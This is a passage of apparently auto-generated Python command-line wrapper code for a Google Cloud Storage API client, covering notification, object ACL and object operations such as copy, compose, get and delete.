    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    request = messages.ObjectAccessControl(
        bucket=bucket.decode('utf8'),
        entity=entity.decode('utf8'),
    )
    # Only explicitly-set flags (.present) are copied onto the request body.
    if FLAGS['domain'].present:
      request.domain = FLAGS.domain.decode('utf8')
    if FLAGS['email'].present:
      request.email = FLAGS.email.decode('utf8')
    if FLAGS['entityId'].present:
      request.entityId = FLAGS.entityId.decode('utf8')
    if FLAGS['etag'].present:
      request.etag = FLAGS.etag.decode('utf8')
    if FLAGS['generation'].present:
      request.generation = int(FLAGS.generation)
    if FLAGS['id'].present:
      request.id = FLAGS.id.decode('utf8')
    if FLAGS['kind'].present:
      request.kind = FLAGS.kind.decode('utf8')
    if FLAGS['object'].present:
      request.object = FLAGS.object.decode('utf8')
    if FLAGS['projectTeam'].present:
      # 'projectTeam' is supplied as a JSON string and parsed into the
      # nested message type.
      request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
    if FLAGS['role'].present:
      request.role = FLAGS.role.decode('utf8')
    if FLAGS['selfLink'].present:
      request.selfLink = FLAGS.selfLink.decode('utf8')
    result = client.defaultObjectAccessControls.Update(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class NotificationsDelete(apitools_base_cli.NewCmd):
"""Command wrapping notifications.Delete."""
usage = """notifications_delete <notification>"""
def __init__(self, name, fv):
super(NotificationsDelete, self).__init__(name, fv)
def RunWithArgs(self, notification):
"""Permanently deletes a notification subscription.
Args:
notification: ID of the notification to delete.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsDeleteRequest(
notification=notification.decode('utf8'),
)
result = client.notifications.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsGet(apitools_base_cli.NewCmd):
"""Command wrapping notifications.Get."""
usage = """notifications_get <notification>"""
def __init__(self, name, fv):
super(NotificationsGet, self).__init__(name, fv)
def RunWithArgs(self, notification):
"""View a notification configuration.
Args:
notification: Notification ID
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsGetRequest(
notification=notification.decode('utf8'),
)
result = client.notifications.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class NotificationsInsert(apitools_base_cli.NewCmd):
  """Command wrapping notifications.Insert."""
  usage = """notifications_insert"""
  def __init__(self, name, fv):
    super(NotificationsInsert, self).__init__(name, fv)
    # The request body is a Notification message; every field is exposed as
    # an optional flag on this command's FlagValues object (fv).
    flags.DEFINE_string(
        'bucket',
        None,
        u'The name of the bucket this subscription is particular to.',
        flag_values=fv)
    flags.DEFINE_string(
        'custom_attributes',
        None,
        u'An optional list of additional attributes to attach to each Cloud '
        u'PubSub message published for this notification subscription.',
        flag_values=fv)
    flags.DEFINE_string(
        'etag',
        None,
        u'HTTP 1.1 Entity tag for this subscription notification.',
        flag_values=fv)
    flags.DEFINE_string(
        'event_types',
        None,
        u'If present, only send notifications about listed event types. If '
        u'empty, sent notifications for all event types.',
        flag_values=fv)
    flags.DEFINE_string(
        'id',
        None,
        u'The ID of the notification.',
        flag_values=fv)
    flags.DEFINE_string(
        'kind',
        u'storage#notification',
        u'The kind of item this is. For notifications, this is always '
        u'storage#notification.',
        flag_values=fv)
    flags.DEFINE_string(
        'object_metadata_format',
        u'JSON_API_V1',
        u'If payload_content is OBJECT_METADATA, controls the format of that '
        u'metadata. Otherwise, must not be set.',
        flag_values=fv)
    flags.DEFINE_string(
        'object_name_prefix',
        None,
        u'If present, only apply this notification configuration to object '
        u'names that begin with this prefix.',
        flag_values=fv)
    flags.DEFINE_string(
        'payload_content',
        u'OBJECT_METADATA',
        u'The desired content of the Payload. Defaults to OBJECT_METADATA.',
        flag_values=fv)
    flags.DEFINE_string(
        'selfLink',
        None,
        u'The canonical URL of this notification.',
        flag_values=fv)
    flags.DEFINE_string(
        'topic',
        None,
        u'The Cloud PubSub topic to which this subscription publishes. '
        u"Formatted as: '//pubsub.googleapis.com/projects/{project-"
        u"identifier}/topics/{my-topic}'",
        flag_values=fv)
  def RunWithArgs(self):
    """Creates a notification subscription for a given bucket.
    Flags:
      bucket: The name of the bucket this subscription is particular to.
      custom_attributes: An optional list of additional attributes to attach
        to each Cloud PubSub message published for this notification
        subscription.
      etag: HTTP 1.1 Entity tag for this subscription notification.
      event_types: If present, only send notifications about listed event
        types. If empty, sent notifications for all event types.
      id: The ID of the notification.
      kind: The kind of item this is. For notifications, this is always
        storage#notification.
      object_metadata_format: If payload_content is OBJECT_METADATA, controls
        the format of that metadata. Otherwise, must not be set.
      object_name_prefix: If present, only apply this notification
        configuration to object names that begin with this prefix.
      payload_content: The desired content of the Payload. Defaults to
        OBJECT_METADATA.
      selfLink: The canonical URL of this notification.
      topic: The Cloud PubSub topic to which this subscription publishes.
        Formatted as: '//pubsub.googleapis.com/projects/{project-
        identifier}/topics/{my-topic}'
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    request = messages.Notification(
    )
    # Only explicitly-set flags (.present) are copied onto the request body.
    if FLAGS['bucket'].present:
      request.bucket = FLAGS.bucket.decode('utf8')
    if FLAGS['custom_attributes'].present:
      # 'custom_attributes' arrives as a JSON string and is parsed into the
      # nested message type.
      request.custom_attributes = apitools_base.JsonToMessage(messages.Notification.CustomAttributesValue, FLAGS.custom_attributes)
    if FLAGS['etag'].present:
      request.etag = FLAGS.etag.decode('utf8')
    if FLAGS['event_types'].present:
      # NOTE(review): 'event_types' is registered above as a DEFINE_string
      # flag, so iterating FLAGS.event_types here yields individual
      # characters rather than event-type names — this looks like it should
      # be a list flag or a comma-split. Confirm against the code generator
      # before relying on this flag.
      request.event_types = [x.decode('utf8') for x in FLAGS.event_types]
    if FLAGS['id'].present:
      request.id = FLAGS.id.decode('utf8')
    if FLAGS['kind'].present:
      request.kind = FLAGS.kind.decode('utf8')
    if FLAGS['object_metadata_format'].present:
      request.object_metadata_format = FLAGS.object_metadata_format.decode('utf8')
    if FLAGS['object_name_prefix'].present:
      request.object_name_prefix = FLAGS.object_name_prefix.decode('utf8')
    if FLAGS['payload_content'].present:
      request.payload_content = FLAGS.payload_content.decode('utf8')
    if FLAGS['selfLink'].present:
      request.selfLink = FLAGS.selfLink.decode('utf8')
    if FLAGS['topic'].present:
      request.topic = FLAGS.topic.decode('utf8')
    result = client.notifications.Insert(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class NotificationsList(apitools_base_cli.NewCmd):
"""Command wrapping notifications.List."""
usage = """notifications_list <bucket>"""
def __init__(self, name, fv):
super(NotificationsList, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Retrieves a list of notification subscriptions for a given bucket.
Args:
bucket: Name of a GCS bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageNotificationsListRequest(
bucket=bucket.decode('utf8'),
)
result = client.notifications.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsDelete(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Delete."""
usage = """objectAccessControls_delete <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsDelete, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Permanently deletes the ACL entry for the specified entity on the
specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsDeleteRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsGet(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Get."""
usage = """objectAccessControls_get <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsGet, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Returns the ACL entry for the specified entity on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsGetRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsInsert(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Insert."""
usage = """objectAccessControls_insert <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectAccessControlsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Creates a new ACL entry on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsInsertRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.List."""
usage = """objectAccessControls_list <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectAccessControlsList, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Retrieves ACL entries on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsListRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objectAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsPatch(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Patch."""
usage = """objectAccessControls_patch <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Updates an ACL entry on the specified object. This method supports
patch semantics.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsPatchRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectAccessControlsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping objectAccessControls.Update."""
usage = """objectAccessControls_update <bucket> <object> <entity>"""
def __init__(self, name, fv):
super(ObjectAccessControlsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'objectAccessControl',
None,
u'A ObjectAccessControl resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object, entity):
"""Updates an ACL entry on the specified object.
Args:
bucket: Name of a bucket.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
objectAccessControl: A ObjectAccessControl resource to be passed as the
request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectAccessControlsUpdateRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['objectAccessControl'].present:
request.objectAccessControl = apitools_base.JsonToMessage(messages.ObjectAccessControl, FLAGS.objectAccessControl)
result = client.objectAccessControls.Update(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsCompose(apitools_base_cli.NewCmd):
"""Command wrapping objects.Compose."""
usage = """objects_compose <destinationBucket> <destinationObject>"""
def __init__(self, name, fv):
super(ObjectsCompose, self).__init__(name, fv)
flags.DEFINE_string(
'composeRequest',
None,
u'A ComposeRequest resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'destinationPredefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to the destination '
u'object.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, destinationBucket, destinationObject):
"""Concatenates a list of existing objects into a new object in the same
bucket.
Args:
destinationBucket: Name of the bucket in which to store the new object.
destinationObject: Name of the new object. For information about how to
URL encode object names to be path safe, see Encoding URI Path Parts.
Flags:
composeRequest: A ComposeRequest resource to be passed as the request
body.
destinationPredefinedAcl: Apply a predefined set of access controls to
the destination object.
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsComposeRequest(
destinationBucket=destinationBucket.decode('utf8'),
destinationObject=destinationObject.decode('utf8'),
)
if FLAGS['composeRequest'].present:
request.composeRequest = apitools_base.JsonToMessage(messages.ComposeRequest, FLAGS.composeRequest)
if FLAGS['destinationPredefinedAcl'].present:
request.destinationPredefinedAcl = messages.StorageObjectsComposeRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Compose(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsCopy(apitools_base_cli.NewCmd):
"""Command wrapping objects.Copy."""
usage = """objects_copy <sourceBucket> <sourceObject> <destinationBucket> <destinationObject>"""
def __init__(self, name, fv):
super(ObjectsCopy, self).__init__(name, fv)
flags.DEFINE_enum(
'destinationPredefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to the destination '
u'object.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the object '
u'resource specifies the acl property, when it defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'sourceGeneration',
None,
u'If present, selects a specific revision of the source object (as '
u'opposed to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, sourceBucket, sourceObject, destinationBucket, destinationObject):
"""Copies a source object to a destination object. Optionally overrides
metadata.
Args:
sourceBucket: Name of the bucket in which to find the source object.
sourceObject: Name of the source object. For information about how to
URL encode object names to be path safe, see Encoding URI Path Parts.
destinationBucket: Name of the bucket in which to store the new object.
Overrides the provided object metadata's bucket value, if any.For
information about how to URL encode object names to be path safe, see
Encoding URI Path Parts.
destinationObject: Name of the new object. Required when the object
metadata is not otherwise provided. Overrides the object metadata's
name value, if any.
Flags:
destinationPredefinedAcl: Apply a predefined set of access controls to
the destination object.
ifGenerationMatch: Makes the operation conditional on whether the
destination object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
destination object's current generation does not match the given
value.
ifMetagenerationMatch: Makes the operation conditional on whether the
destination object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
destination object's current metageneration does not match the given
value.
ifSourceGenerationMatch: Makes the operation conditional on whether the
source object's generation matches the given value.
ifSourceGenerationNotMatch: Makes the operation conditional on whether
the source object's generation does not match the given value.
ifSourceMetagenerationMatch: Makes the operation conditional on whether
the source object's current metageneration matches the given value.
ifSourceMetagenerationNotMatch: Makes the operation conditional on
whether the source object's current metageneration does not match the
given value.
object: A Object resource to be passed as the request body.
projection: Set of properties to return. Defaults to noAcl, unless the
object resource specifies the acl property, when it defaults to full.
sourceGeneration: If present, selects a specific revision of the source
object (as opposed to the latest version, the default).
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsCopyRequest(
sourceBucket=sourceBucket.decode('utf8'),
sourceObject=sourceObject.decode('utf8'),
destinationBucket=destinationBucket.decode('utf8'),
destinationObject=destinationObject.decode('utf8'),
)
if FLAGS['destinationPredefinedAcl'].present:
request.destinationPredefinedAcl = messages.StorageObjectsCopyRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['ifSourceGenerationMatch'].present:
request.ifSourceGenerationMatch = int(FLAGS.ifSourceGenerationMatch)
if FLAGS['ifSourceGenerationNotMatch'].present:
request.ifSourceGenerationNotMatch = int(FLAGS.ifSourceGenerationNotMatch)
if FLAGS['ifSourceMetagenerationMatch'].present:
request.ifSourceMetagenerationMatch = int(FLAGS.ifSourceMetagenerationMatch)
if FLAGS['ifSourceMetagenerationNotMatch'].present:
request.ifSourceMetagenerationNotMatch = int(FLAGS.ifSourceMetagenerationNotMatch)
if FLAGS['object'].present:
request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsCopyRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['sourceGeneration'].present:
request.sourceGeneration = int(FLAGS.sourceGeneration)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Copy(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsDelete(apitools_base_cli.NewCmd):
"""Command wrapping objects.Delete."""
usage = """objects_delete <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsDelete, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, permanently deletes a specific revision of this object '
u'(as opposed to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Deletes an object and its metadata. Deletions are permanent if
versioning is not enabled for the bucket, or if the generation parameter
is used.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, permanently deletes a specific revision of this
object (as opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsDeleteRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
result = client.objects.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsGet(apitools_base_cli.NewCmd):
"""Command wrapping objects.Get."""
usage = """objects_get <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsGet, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's generation "
u'matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's generation "
u'does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Retrieves an object or its metadata.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
projection: Set of properties to return. Defaults to noAcl.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsGetRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsGetRequest.ProjectionValueValuesEnum(FLAGS.projection)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Get(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsGetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping objects.GetIamPolicy."""
usage = """objects_getIamPolicy <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsGetIamPolicy, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Returns an IAM policy for the specified object.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsGetIamPolicyRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objects.GetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsInsert(apitools_base_cli.NewCmd):
"""Command wrapping objects.Insert."""
usage = """objects_insert <bucket>"""
def __init__(self, name, fv):
super(ObjectsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'contentEncoding',
None,
u'If set, sets the contentEncoding property of the final object to '
u'this value. Setting this parameter is equivalent to setting the '
